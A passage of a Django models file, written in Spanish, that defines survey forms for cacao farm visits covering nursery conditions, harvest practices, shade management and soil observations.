# verbose_name_plural = 'I.Conversación con el Productor o productora'
CHOICE_VIVERO_NUEVO_CONVERSACION2 = ((1,'Misma finca'),(2,'Del jardin clonal'),(3, 'Otras fuentes'))
class ViveroConversacion2(models.Model):
conversacion7 = models.IntegerField(choices=CHOICE_VIVERO_CONVERSACION_7,
verbose_name='¿Qué tamaño de bolsa de polietileno utiliza para la producción de plantas en vivero?')
conversacion8 = models.IntegerField(choices=CHOICE_VIVERO_CONVERSACION_8,
verbose_name='¿Cómo coloca la semilla en el sustrato en la bolsa de polietileno?')
conversacion9 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_9,
verbose_name='¿Cómo es el sitio del vivero?')
conversacion10 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_10,
verbose_name=' ¿Qué tipo de injerto ha realizado?')
conversacion11 = models.FloatField('¿Cuál ha sido el porcentaje de prendimiento?', null=True)
conversacion12 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_12,
verbose_name='¿De dónde obtiene las varetas para realizar los injertos?')
conversacion13 = models.FloatField('¿Cuanto meses se mantiene la plata en el vivero?', null=True, blank=True)
conversacion14 = models.IntegerField(choices=CHOICE_VIVERO_NUEVO_CONVERSACION2,
verbose_name='¿De donde obtiene las semillas?', null=True, blank=True)
ficha = models.ForeignKey(FichaVivero)
def __unicode__(self):
return u"Conversación con el Productor o productora 2"
#observaciones
CHOICER_VIVIERO_FUENTE_SEMILLA = ((1,'De la misma finca'),(2,'De finca vecina'),(3,'De Jardín Clonal'))
class VivieroObservacion1(models.Model):
observacion1 = models.FloatField('Cantidad de las plantas')
observacion2 = models.FloatField('Edad de las plantas en meses')
observacion3 = models.IntegerField(choices=CHOICER_VIVIERO_FUENTE_SEMILLA,
verbose_name='Fuente de semilla')
ficha = models.ForeignKey(FichaVivero)
def __unicode__(self):
return u"Observación del vivero 1"
class Meta:
verbose_name = ''
verbose_name_plural = ''
CHOICE_VIVERO_PLAGAS_ENFERMEDADES = (
(1, 'Zompopo'),
(2, 'Barrenador'),
(3, 'Minador'),
(4, 'Tizón'),
(5, 'Antracnosis'),
(6, 'Mal de talluelo'),
(7, 'Áfidos'),
(8, 'Gusanos'),
(9, 'Deficiencia nutricional'),
)
CHOICE_VIVERO_SI_NO = (
(1, 'Si'),
(2, 'No'),
)
class VivieroObservacion2(models.Model):
observacion3 = models.IntegerField(choices=CHOICE_VIVERO_PLAGAS_ENFERMEDADES,
verbose_name='Plaga o enfermedad')
planta_1 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_2 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_3 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_4 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_5 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_6 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_7 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_8 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_9 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_10 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
ficha = models.ForeignKey(FichaVivero)
total_si = models.IntegerField(editable=False, null=True, blank=True)
def __unicode__(self):
return u"Observación del vivero 2"
def save(self, *args, **kwargs):
contar_total = 0
if self.planta_1 == 1:
contar_total += 1
if self.planta_2 == 1:
contar_total += 1
if self.planta_3 == 1:
contar_total += 1
if self.planta_4 == 1:
contar_total += 1
if self.planta_5 == 1:
contar_total += 1
if self.planta_6 == 1:
contar_total += 1
if self.planta_7 == 1:
contar_total += 1
if self.planta_8 == 1:
contar_total += 1
if self.planta_9 == 1:
contar_total += 1
if self.planta_10 == 1:
contar_total += 1
self.total_si = contar_total
super(VivieroObservacion2, self).save(*args, **kwargs)
# class Meta:
# verbose_name = 'Presencia de plagas y enfermedades'
# verbose_name_plural = 'Presencia de plagas y enfermedades'
class ProductosVivero(models.Model):
nombre = models.CharField(max_length=250)
def __unicode__(self):
return self.nombre
# class Meta:
# verbose_name = 'Productos para el vivero'
# verbose_name_plural = 'Productos para el vivero'
CHOICE_VIVERO_UNIDAD_PRODUCTOS = ((1,'Onz/planta'),(2,'Lt/bombada'),(3,'onz/bomba'),)
class VivieroObservacionProductos(models.Model):
producto = models.ForeignKey(ProductosVivero, verbose_name='Nombre')
cantidad = models.FloatField()
unidad = models.IntegerField(choices=CHOICE_VIVERO_UNIDAD_PRODUCTOS)
frecuencia = models.FloatField()
ficha = models.ForeignKey(FichaVivero)
def __unicode__(self):
return u"Observación del vivero 3"
CHOICE_VIVERO_ANALISIS_1 = (
('A', 'Ningún problema'),
('B', 'Proveniente de plantas con baja productividad'),
('C', 'Posiblemente con alta incompatibilidad'),
)
CHOICE_VIVERO_ANALISIS_2 = (
('A', 'Ningún problema'),
('B', 'Planta desuniforme'),
('C', 'Plantas con poco vigor'),
('D', 'Plantas con deficiencia nutricionales'),
('E', 'Mal manejo de riego'),
('F', 'Mal manejo de sombra'),
)
CHOICE_VIVERO_ANALISIS_3 = (
('A', 'Zompopo'),
('B', 'Barrenador'),
('C', 'Minador'),
('D', 'Tizón'),
('E', 'Antracnosis'),
('F', 'Mal de talluelo'),
('G', 'Áfidos'),
('H', 'Gusanos'),
)
CHOICE_VIVERO_ANALISIS_4 = (
('A', 'Mejorar la fuente de semilla'),
('B', 'Mezclar las 9 fuentes de semilla'),
('C', 'Mejorar el sustrato en las bolsas'),
('D', 'Mejorar el manejo de plagas'),
('E', 'Mejorar el manejo de nutrición'),
('F', 'Mejorar el riego y sombra'),
)
class VivieroAnalisisSituacion(models.Model):
analisis1 = MultiSelectField(choices=CHOICE_VIVERO_ANALISIS_1,
verbose_name='¿Cuáles son los problemas de la semilla?')
analisis2 = MultiSelectField(choices=CHOICE_VIVERO_ANALISIS_2,
verbose_name='¿Cuáles son los problemas las plantas?')
analisis3 = MultiSelectField(choices=CHOICE_VIVERO_ANALISIS_3,
verbose_name='¿Cuáles son los problemas de plagas y enfermedades?')
analisis4 = MultiSelectField(choices=CHOICE_VIVERO_ANALISIS_4,
verbose_name='¿Qué acciones vamos a realizar para mejorar el vivero?')
ficha = models.ForeignKey(FichaVivero)
def __unicode__(self):
return u"Análisis de la situación y acciones en el vivero"
#-------- fin de ficha vivero -----------------------
#--------- inicia ficha cosecha ----------------------
class FichaCosecha(models.Model):
productor = models.ForeignKey(
Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_cosecha')
tecnico = models.ForeignKey(
Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_cosecha')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha cosecha"
verbose_name_plural = "Ficha cosecha"
CHOICE_COSECHA_CONVERSACION_1 = (
('A', 'Por el color'),
('B', 'Por el tamaño'),
('C', 'Por la textura'),
('D', 'Por la fecha'),
)
CHOICE_COSECHA_CONVERSACION_2 = (
('A', 'Media Luna'),
('B', 'Cutacha'),
('C', 'Machete'),
('D', 'Tijera'),
)
CHOICE_COSECHA_CONVERSACION_3 = (
('A', 'Rechazar mazorcas enfermas'),
('B', 'Rechazar mazorcas dañadas'),
('C', 'Rechazar mazorcas sobremaduras'),
('D', 'Rechazar mazorcas inmaduras'),
('E', 'Rechazar mazorcas pequeñas'),
('F', 'Seleccionar mazorcas maduras'),
('G', 'Seleccionar mazorcas de buena calidad'),
)
CHOICE_COSECHA_CONVERSACION_4 = (
('A', 'Media Luna'),
('B', 'Cutacha'),
('C', 'Machete'),
('D', 'Maso'),
)
class CosechaConversacion1(models.Model):
conversacion1 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_1,
verbose_name='1.1-¿Cómo se determina qué la mazorca está madura para cosecha? ')
conversacion2 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_2,
verbose_name='1.2-¿Qué herramientas utiliza para el corte de las mazorcas maduras? ')
conversacion3 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_3,
verbose_name='1.3-¿Qué criterios toma en cuenta para la selección de mazorcas antes del quiebre? ')
conversacion4 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_4,
verbose_name='1.4-¿Qué herramientas utiliza para el quiebre de las mazorcas seleccionadas? ')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"Conversación con la productora o el productor 1"
CHOICE_COSECHA_CONVERSACION_5 = (
('A', 'Bolsa plástica'),
('B', 'Bidón o Balde'),
('C', 'Saco Macen'),
('D', 'Saco de yute'),
('E', 'Cajón de madera'),
)
CHOICE_COSECHA_CONVERSACION_7 = (
('A', 'Entierra las mazorcas'),
('B', 'Botan las mazorcas sin enterrar'),
('C', 'Queman las mazorcas'),
)
CHOICE_COSECHA_CONVERSACION_8 = (
(1, 'Cada mes'),
(2, 'Cada quince días'),
(3, 'Depende de la maduración'),
)
class CosechaConversacion2(models.Model):
conversacion5 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_5,
verbose_name='1.5-¿Qué tipo de almacenamiento emplea después del quiebre de las mazorcas de cacao? ')
conversacion6 = models.FloatField('1.6-¿Cuánto tiempo tarda en llevar el cacao en baba al centro de acopio?')
conversacion7 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_7,
verbose_name='1.7-¿Qué manejo realiza con las mazorcas de cacao enfermas? ')
conversacion8 = models.IntegerField(choices=CHOICE_COSECHA_CONVERSACION_8,
verbose_name='1.8-¿Cada cuánto realizan los cortes? ')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"Conversación con la productora o el productor 2"
CHOICE_COSECHA_9_MESES = (
(1, 'Enero'),
(2, 'Febrero'),
(3, 'Marzo'),
(4, 'Abril'),
(5, 'Mayo'),
(6, 'Junio'),
(7, 'Julio'),
(8, 'Agosto'),
(9, 'Septiembre'),
(10, 'Octubre'),
(11, 'Noviembre'),
(12, 'Diciembre'),
)
CHOICE_COSECHA_9_FLORACION = (
(1, 'No hay flores'),
(2, 'Poca flores'),
(3, 'Algo de flores'),
(4, 'Mucha flores'),
)
class CosechaMesesFloracion(models.Model):
mes = models.IntegerField(choices=CHOICE_COSECHA_9_MESES,
verbose_name='Meses')
floracion = models.IntegerField(choices=CHOICE_COSECHA_9_FLORACION,
verbose_name='Floración')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"¿Cuáles son las meses de mayor floración? "
CHOICE_COSECHA_10_COSECHA = (
(1, 'No hay Cosecha'),
(2, 'Poca cosecha'),
(3, 'Algo de cosecha'),
(4, 'Mucha cosecha'),
)
class CosechaMesesCosecha(models.Model):
mes = models.IntegerField(choices=CHOICE_COSECHA_9_MESES,
verbose_name='Meses')
floracion = models.IntegerField(choices=CHOICE_COSECHA_10_COSECHA,
verbose_name='Cosecha')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"¿Cuáles son las meses de mayor floración? "
CHOICE_COSECHA_ESTIMADO_PUNTOS = (
(1, 'Número de mazorcas sanas'),
(2, 'Número de mazorcas enfermas'),
(3, 'Número de mazorcas dañadas'),
)
class CosechaPunto1(models.Model):
mazorcas = models.IntegerField(choices=CHOICE_COSECHA_ESTIMADO_PUNTOS,
verbose_name='Mazorcas')
planta_1 = models.FloatField()
planta_2 = models.FloatField()
planta_3 = models.FloatField()
planta_4 = models.FloatField()
planta_5 = models.FloatField()
planta_6 = models.FloatField()
planta_7 = models.FloatField()
planta_8 = models.FloatField()
planta_9 = models.FloatField()
planta_10 = models.FloatField()
total_platas = models.FloatField(editable=False, null=True, blank=True)
contador = models.IntegerField(editable=False, default=0, null=True, blank=True)
ficha = models.ForeignKey(FichaCosecha)
def save(self, *args, **kwargs):
self.total_platas = self.planta_1 + self.planta_2 + self.planta_3 + self.planta_4 + \
self.planta_5 + self.planta_6 + self.planta_7 + self.planta_8 + self.planta_9 + self.planta_10
contar = 0
if self.planta_1 >= 0:
contar += 1
if self.planta_2 >= 0:
contar += 1
if self.planta_3 >= 0:
contar += 1
if self.planta_4 >= 0:
contar += 1
if self.planta_5 >= 0:
contar += 1
if self.planta_6 >= 0:
contar += 1
if self.planta_7 >= 0:
contar += 1
if self.planta_8 >= 0:
contar += 1
if self.planta_9 >= 0:
contar += 1
if self.planta_10 >= 0:
contar += 1
self.contador = contar
super(CosechaPunto1, self).save(*args, **kwargs)
def __unicode__(self):
return u"2.1 Punto 1"
class CosechaPunto2(models.Model):
mazorcas = models.IntegerField(choices=CHOICE_COSECHA_ESTIMADO_PUNTOS,
verbose_name='Mazorcas')
planta_1 = models.FloatField()
planta_2 = models.FloatField()
planta_3 = models.FloatField()
planta_4 = models.FloatField()
planta_5 = models.FloatField()
planta_6 = models.FloatField()
planta_7 = models.FloatField()
planta_8 = models.FloatField()
planta_9 = models.FloatField()
planta_10 = models.FloatField()
total_platas = models.FloatField(editable=False, null=True, blank=True)
contador = models.IntegerField(editable=False, default=0, null=True, blank=True)
ficha = models.ForeignKey(FichaCosecha)
def save(self, *args, **kwargs):
self.total_platas = self.planta_1 + self.planta_2 + self.planta_3 + self.planta_4 + \
self.planta_5 + self.planta_6 + self.planta_7 + self.planta_8 + self.planta_9 + self.planta_10
contar = 0
if self.planta_1 >= 0:
contar += 1
if self.planta_2 >= 0:
contar += 1
if self.planta_3 >= 0:
contar += 1
if self.planta_4 >= 0:
contar += 1
if self.planta_5 >= 0:
contar += 1
if self.planta_6 >= 0:
contar += 1
if self.planta_7 >= 0:
contar += 1
if self.planta_8 >= 0:
contar += 1
if self.planta_9 >= 0:
contar += 1
if self.planta_10 >= 0:
contar += 1
self.contador = contar
super(CosechaPunto2, self).save(*args, **kwargs)
def __unicode__(self):
return u"2.2 Punto 2"
class CosechaPunto3(models.Model):
mazorcas = models.IntegerField(choices=CHOICE_COSECHA_ESTIMADO_PUNTOS,
verbose_name='Mazorcas')
planta_1 = models.FloatField()
planta_2 = models.FloatField()
planta_3 = models.FloatField()
planta_4 = models.FloatField()
planta_5 = models.FloatField()
planta_6 = models.FloatField()
planta_7 = models.FloatField()
planta_8 = models.FloatField()
planta_9 = models.FloatField()
planta_10 = models.FloatField()
total_platas = models.FloatField(editable=False, null=True, blank=True)
contador = models.IntegerField(editable=False, default=0, null=True, blank=True)
ficha = models.ForeignKey(FichaCosecha)
def save(self, *args, **kwargs):
self.total_platas = self.planta_1 + self.planta_2 + self.planta_3 + self.planta_4 + \
self.planta_5 + self.planta_6 + self.planta_7 + self.planta_8 + self.planta_9 + self.planta_10
contar = 0
if self.planta_1 >= 0:
contar += 1
if self.planta_2 >= 0:
contar += 1
if self.planta_3 >= 0:
contar += 1
if self.planta_4 >= 0:
contar += 1
if self.planta_5 >= 0:
contar += 1
if self.planta_6 >= 0:
contar += 1
if self.planta_7 >= 0:
contar += 1
if self.planta_8 >= 0:
contar += 1
if self.planta_9 >= 0:
contar += 1
if self.planta_10 >= 0:
contar += 1
self.contador = contar
super(CosechaPunto3, self).save(*args, **kwargs)
def __unicode__(self):
return u"2.3 Punto 3"
class CosechaAreaPlantas(models.Model):
area = models.FloatField('Área de la parcela (en mz)')
plantas = models.FloatField('Número de plantas por mz')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"Area y número de platas"
CHOICE_COSECHA_ANALISIS_1 = (
('A', 'Pocas plantas productivas'),
('B', 'Muchas mazorcas enfermas'),
('C', 'Muchas mazorcas dañadas'),
('D', 'Muchas mazorcas pequeñas'),
('E', 'Muchas mazorcas con pocos granos'),
('F', 'Muchos granos pequeños'),
)
CHOICE_COSECHA_ANALISIS_2 = (
('A', 'Mazorcas enfermas'),
('B', 'Mazorcas dañadas'),
('C', 'Mazorcas pequeñas'),
)
CHOICE_COSECHA_ANALISIS_3 = (
('A', 'Remover las mazorcas enfermas a tiempo'),
('B', 'Establecer control de las ardillas'),
('C', 'Mejorar la nutrición de las plantas'),
('D', 'Realizar poda de las plantas de cacao'),
('E', 'Regular la sombra'),
('F', 'Cosechar a tiempo'),
('G', 'Reponer las plantas no productivas con plantas productivas'),
)
class CosechaAnalisis(models.Model):
analisis1 = MultiSelectField(choices=CHOICE_COSECHA_ANALISIS_1,
verbose_name='3.1-¿Cuál es el problema principal que afecta el rendimiento productivo de la parcela de cacao?')
analisis2 = MultiSelectField(choices=CHOICE_COSECHA_ANALISIS_2,
verbose_name='3.2-¿Cuál es la causa de la pérdida de producción en la parcela de cacao? ')
analisis3 = MultiSelectField(choices=CHOICE_COSECHA_ANALISIS_3,
verbose_name='3.3-¿Qué prácticas se pueden realizar en la parcela de cacao para mejorar la cosecha? ')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"Análisis sobre la cosecha y acciones"
# ---------------- fin ficha cosecha ---------------------------------
# ---------------- inicia ficha saf ----------------------------------
class FichaSaf(models.Model):
productor = models.ForeignKey(
Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_saf')
tecnico = models.ForeignKey(
Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_saf')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha saf"
verbose_name_plural = "Ficha saf"
CHOICE_SAF_1_1 = (
('A', 'Producción convencional con uso intensivo de químicos'),
('B', 'Producción orgánica con insumos naturales'),
('C', 'Producción agroecológica y diversificada'),
('D', 'Producción especializada según el tipo de mercado'),
)
CHOICE_SAF_1_2 = (
('A', 'Producción de cacao'),
('B', 'Producción de frutas'),
('C', 'Producción de madera'),
('D', 'Conservación de suelo y agua'),
('E', 'Aumento de ingresos'),
('F', 'Generar empleo'),
('G', 'Diversidad natural'),
('H', 'Otros beneficios'),
)
class SafConversacion1(models.Model):
conversacion1 = MultiSelectField(choices=CHOICE_SAF_1_1,
verbose_name='1.1¿Cuál fue su objetivo de establecer el cultivo de cacao en sistema agroforestales?')
conversacion2 = MultiSelectField(choices=CHOICE_SAF_1_2,
verbose_name='1.2¿Qué beneficios esperaban del sistema agroforestal en su parcela de cacao?')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Conversación 1"
CHOICE_SAF_1_3 = (
(1, 'Nada de lluvia'),
(2, 'Poca lluvia'),
(3, 'Algo de lluvia'),
(4, 'Mucha lluvia'),
)
class SafConversacion2(models.Model):
conversacion3 = models.IntegerField(choices=CHOICE_COSECHA_9_MESES,
verbose_name='Meses')
conversacion4 = models.IntegerField(choices=CHOICE_SAF_1_3,
verbose_name='Opciones')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.3¿Cuáles son meses más lluviosos en su finca?"
CHOICE_SAF_1_4 = (
(1, 'Nada de viento'),
(2, 'Poco viento'),
(3, 'Algo de viento'),
(4, 'Mucho viento'),
)
class SafConversacion3(models.Model):
conversacion3 = models.IntegerField(choices=CHOICE_COSECHA_9_MESES,
verbose_name='Meses')
conversacion4 = models.IntegerField(choices=CHOICE_SAF_1_4,
verbose_name='Opciones')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.4¿Cuáles son meses más ventosos en su finca?"
CHOICE_SAF_1_5 = (
(1, 'Establecer el vivero'),
(2, 'Limpieza de terreno'),
(3, 'Siembra de cacao'),
(4, 'Establecer la sombra'),
(5, 'Poda de cacao'),
(6, 'Manejo de sombra'),
(7, 'Deshierba'),
(8, 'Abonar'),
(9, 'Foliar'),
(10, 'Deschuponar'),
(11, 'Cortar mazorcas enfermas'),
(12, 'Cosecha y Quiebre'),
)
class SafConversacion4(models.Model):
conversacion5 = models.IntegerField(choices=CHOICE_SAF_1_5,
verbose_name='Opcion')
conversacion6 = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='Opciones')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.5¿Cómo toma en cuenta lluvia y viento para decidir los momentos de las labores de sistema agroforestal?"
CHOICE_SAF_1_5_TOPOGRAFIA = (
(1, 'Terreno plano'),
(2, 'Terreno con poco pendiente'),
(3, 'Terreno con mucho pendiente'),
)
CHOICE_SAF_1_5_FERTILIDAD = (
(1, 'Suelo fértil'),
(2, 'Suelo poco fértil'),
(3, 'Suelo degradado y compacto'),
)
class SafConversacion5(models.Model):
conversacion7 = models.IntegerField(choices=CHOICE_SAF_1_5_TOPOGRAFIA,
verbose_name='Topografía')
conversacion8 = models.IntegerField(choices=CHOICE_SAF_1_5_FERTILIDAD,
verbose_name='Fertilidad')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.5¿Cómo son las características del suelo y su fertilidad?"
CHOICE_SAF_1_6_MADERABLE = (
('A', 'Que tenga buena altura'),
('B', 'Que no tenga hojas en el verano'),
('C', 'Que tenga hojas en el verano '),
('D', 'Que tenga crecimiento rápido '),
('E', 'Que tenga una sombre no muy densa '),
('F', 'Que tenga valor comercial '),
('G', 'Que es fácil para podar '),
)
CHOICE_SAF_1_6_FRUTALES = (
('A', 'Que produce buenos elementos '),
('B', 'Que ayuda a manejar el daño de pájaros y ardillas'),
('C', 'Que tenga resistencia a plagas '),
('D', 'Que tenga una sombre no muy densa'),
('E', 'Que tenga valor comercial'),
('F', 'Que es fácil para manejar'),
)
CHOICE_SAF_1_6_SERVICIOS = (
('A', 'Que produce más y mejor hojarasca '),
('B', 'Que las hojas dan nutrientes'),
('C', 'Que no compiten con cacao'),
('D', 'Que dan buena sombra'),
('E', 'Que tienen hojas todo el tiempo'),
('F', 'Que producen leña'),
('G', 'Que tenga uso medicinal'),
('H', 'Que adapte bien en la zona '),
)
class SafConversacion6(models.Model):
conversacion9 = MultiSelectField(choices=CHOICE_SAF_1_6_MADERABLE,
verbose_name='Para escoger a los árboles maderable ')
conversacion10 = MultiSelectField(choices=CHOICE_SAF_1_6_FRUTALES,
verbose_name='Para escoger a los árboles frutales')
conversacion11 = MultiSelectField(choices=CHOICE_SAF_1_6_SERVICIOS,
verbose_name='Para escoger a los árboles que proveen servicios')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"¿Cuáles son sus criterio para escoger los árboles para acompañar el cacao?"
CHOICE_SAF_1_6_ETAPA = (
(1, 'Crecimiento vegetativo'),
(2, 'Floración'),
(3, 'Cuajado y maduración'),
(4, 'Cosecha'),
)
CHOICE_SAF_1_6_NIVEL_SOMBRA = (
(1, 'Sin sombra'),
(2, 'Poca Sombra'),
(3, 'Media sombra'),
(4, 'Mucha sombra'),
)
class SafConversacion7(models.Model):
conversacion12 = models.IntegerField(choices=CHOICE_SAF_1_6_ETAPA,
verbose_name='Etapas')
conversacion13 = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='Meses que ocurren')
conversacion14 = models.IntegerField(choices=CHOICE_SAF_1_6_NIVEL_SOMBRA,
verbose_name='Nivel de sombra')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.6¿Cómo quisiera tener la sombra en diferentes momentos de vida de cacao?"
CHOICE_SAF_1_7_PROBLEMAS = (
(1, 'Poca floración'),
(2, 'Presencia de malezas'),
(3, 'Presencia de Monilia'),
(4, 'Presencia de mazorca negra'),
(5, 'Baja producción'),
(6, 'Daño de ardillas'),
)
CHOICE_SAF_1_7_CAUSA_PROBLEMAS = (
(1, 'Poca Sombra'),
(2, 'Mucha Sombra'),
)
class SafConversacion8(models.Model):
conversacion15 = models.IntegerField(choices=CHOICE_SAF_1_7_PROBLEMAS,
verbose_name='Problemas')
conversacion16 = models.IntegerField(choices=CHOICE_SAF_1_7_CAUSA_PROBLEMAS,
verbose_name='Que causa el problema')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.7¿Cuál es la percepción de los problemas en relación a la sombra?"
CHOICE_SAF_1_8 = (
(1, 'De propia finca'),
(2, 'De propia finca árboles élites'),
(3, 'De finca vecina'),
(4, 'De jardines clónales'),
(5, 'De afuera del territorio '),
)
CHOICE_SAF_1_9 = (
('A', 'Cacao criollo'),
('B', 'Cacao forastero'),
('C', 'Cacao Trinitario'),
('D', 'Cacao híbrido'),
('E', 'Clones de cacao'),
('F', 'No sabe'),
)
CHOICE_SAF_1_10 = (
('A', 'Cacao criollo'),
('B', 'Cacao forastero'),
('C', 'Cacao Trinitario'),
('D', 'Cacao híbrido'),
('E', 'Clones de cacao'),
('F', 'Cacao rojo'),
('G', 'No sabe'),
)
CHOICE_SAF_1_11 = (
('A', 'Cacao criollo'),
('B', 'Cacao forastero'),
('C', 'Cacao Trinitario'),
('D', 'Cacao híbrido'),
('E', 'Clones de cacao'),
('F', 'Cacao rojo'),
('G', 'No sabe'),
)
class SafConversacion9(models.Model):
conversacion17 = models.IntegerField(choices=CHOICE_SAF_1_8,
verbose_name='1.8¿De dónde obtuvo la semilla para establecer la plantación de cacao? ')
conversacion18 = MultiSelectField(choices=CHOICE_SAF_1_9,
verbose_name='1.9¿Con que tipo de cacao se estableció la plantación de cacao? ')
conversacion19 = MultiSelectField(choices=CHOICE_SAF_1_10,
verbose_name='1.10¿Cuáles son las variedades de cacao tolerantes a las enfermedades? ')
conversacion20 = MultiSelectField(choices=CHOICE_SAF_1_11,
verbose_name='1.11¿Qué tipo de variedades le han recomendado para resiembra y en nuevas plantaciones de cacao? ')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"18,19,20"
CHOICE_SAF_2_TEMA1 = (
(1, 'Cantidad de lombrices/250 cm2'),
)
CHOICE_SAF_2_TEMA2 = (
(1, 'Grado de efervescencia con prueba de Agua Oxigenada'),
)
CHOICE_SAF_2_OPCIONES = (
(1, 'Baja'),
(2, 'Media'),
(3, 'Alta'),
)
class SafObservaciones(models.Model):
observacion1 = models.IntegerField(choices=CHOICE_SAF_2_TEMA1,
verbose_name='Tema')
observacion2 = models.FloatField('Punto 1')
observacion3 = models.FloatField('Punto 2')
observacion4 = models.FloatField('Punto 3')
observacion5 = models.FloatField('Punto 4')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Calidad de vida de suelo 1"
class SafObservaciones2(models.Model):
observacion1 = models.IntegerField(choices=CHOICE_SAF_2_TEMA2,
verbose_name='Tema')
observacion2 = models.IntegerField(choices=CHOICE_SAF_2_OPCIONES,
verbose_name='Punto 1')
observacion3 = models.IntegerField(choices=CHOICE_SAF_2_OPCIONES,
verbose_name='Punto 2')
observacion4 = models.IntegerField(choices=CHOICE_SAF_2_OPCIONES,
verbose_name='Punto 3')
observacion5 = models.IntegerField(choices=CHOICE_SAF_2_OPCIONES,
verbose_name='Punto 4')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Calidad de vida de suelo 2"
CHOICE_SAF_OBSERVACION_2_2 = (
(1, 'Bueno y apto para cacao'),
(2, 'Regular necesita enmienda para mejorar'),
(3, 'Malo y no apto para Cacao'),
(4,'Degradado y compacto no apto para cacao')
)
CHOICE_SAF_OBSERVACION_2_3 = (
('A', 'Promover o sembrar cobertura'),
('B', 'Sembrar árboles que provee buena hojarasca'),
('C', 'Utilizar materiales de poda de sombra y cacao'),
('D', 'Utilizar materiales de banano'),
('E', 'Utilizar abono verde'),
('F', 'Utilizar abono orgánico'),
)
class SafObservaciones3(models.Model):
observacion6 = models.IntegerField(choices=CHOICE_SAF_OBSERVACION_2_2,
verbose_name='2.2Según lo observado en las pruebas de suelo cómo valora es estado de suelo')
observacion7 = MultiSelectField(choices=CHOICE_SAF_OBSERVACION_2_3,
verbose_name='2.3¿Qué prácticas se pueden hacer en el suelo de su parcela de aprendizaje para mejorar el la vida de suelo?')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Observacion 2.2 y 2.3"
class SafObservacionPunto1(models.Model):
especies = models.ForeignKey(Especies)
cantidad = models.FloatField()
lena = models.FloatField('Para leña')
nutrientes = models.FloatField('Para nutrientes')
frutas = models.FloatField('Para Frutas')
madera = models.FloatField('Para Madera')
sombra = models.FloatField('Para sombra')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Punto 1"
class SafObservacionPunto2(models.Model):
especies = models.ForeignKey(Especies)
cantidad = models.FloatField()
lena = models.FloatField('Para leña')
nutrientes = models.FloatField('Para nutrientes')
frutas = models.FloatField('Para Frutas')
madera = models.FloatField('Para Madera')
sombra = models.FloatField('Para sombra')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Punto 2"
class SafObservacionPunto3(models.Model):
especies = models.ForeignKey(Especies)
cantidad = models.FloatField()
lena = models.FloatField('Para leña')
nutrientes = models.FloatField('Para nutrientes')
frutas = models.FloatField('Para Frutas')
madera = models.FloatField('Para Madera')
sombra = models.FloatField('Para sombra')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Punto 3"
CHOICE_SAF_OBSERVACION_2_5 = (
(1, 'Cuadrado'),
(2, 'Rectangular'),
(3, 'Tres bolillos'),
(4, 'Sin arreglo')
)
CHOICE_SAF_OBSERVACION_2_6 = (
(1, 'Demasiado árboles y mucha sombra'),
(2, 'Muy poca árboles y poca sombra'),
(3, 'Plantas de cacao y otros árboles compiten'),
(4, 'No hay problema y arreglo esta bien')
)
CHOICE_SAF_OBSERVACION_2_7 = (
(1, 'Cacao + maderable + musáceas + pejibaye'),
(2, 'Cacao + musáceas + cultivos anuales'),
(3, 'Cacao + maderables + musáceas'),
(4, 'Cacao + musáceas + leguminosa + maderables'),
(5, 'Cacao + musáceas + leguminosa + maderables+ frutales'),
)
CHOICE_SAF_OBSERVACION_2_8 = (
('A', 'Mejorar la producción de cacao'),
('B', 'Diversificar la producción e ingreso'),
('C', 'Producir más alimento'),
('D', 'Producir leña'),
('E', 'Producir madera'),
('F', 'Mejorar la conservación de Recursos naturales'),
)
class SafObservaciones4(models.Model):
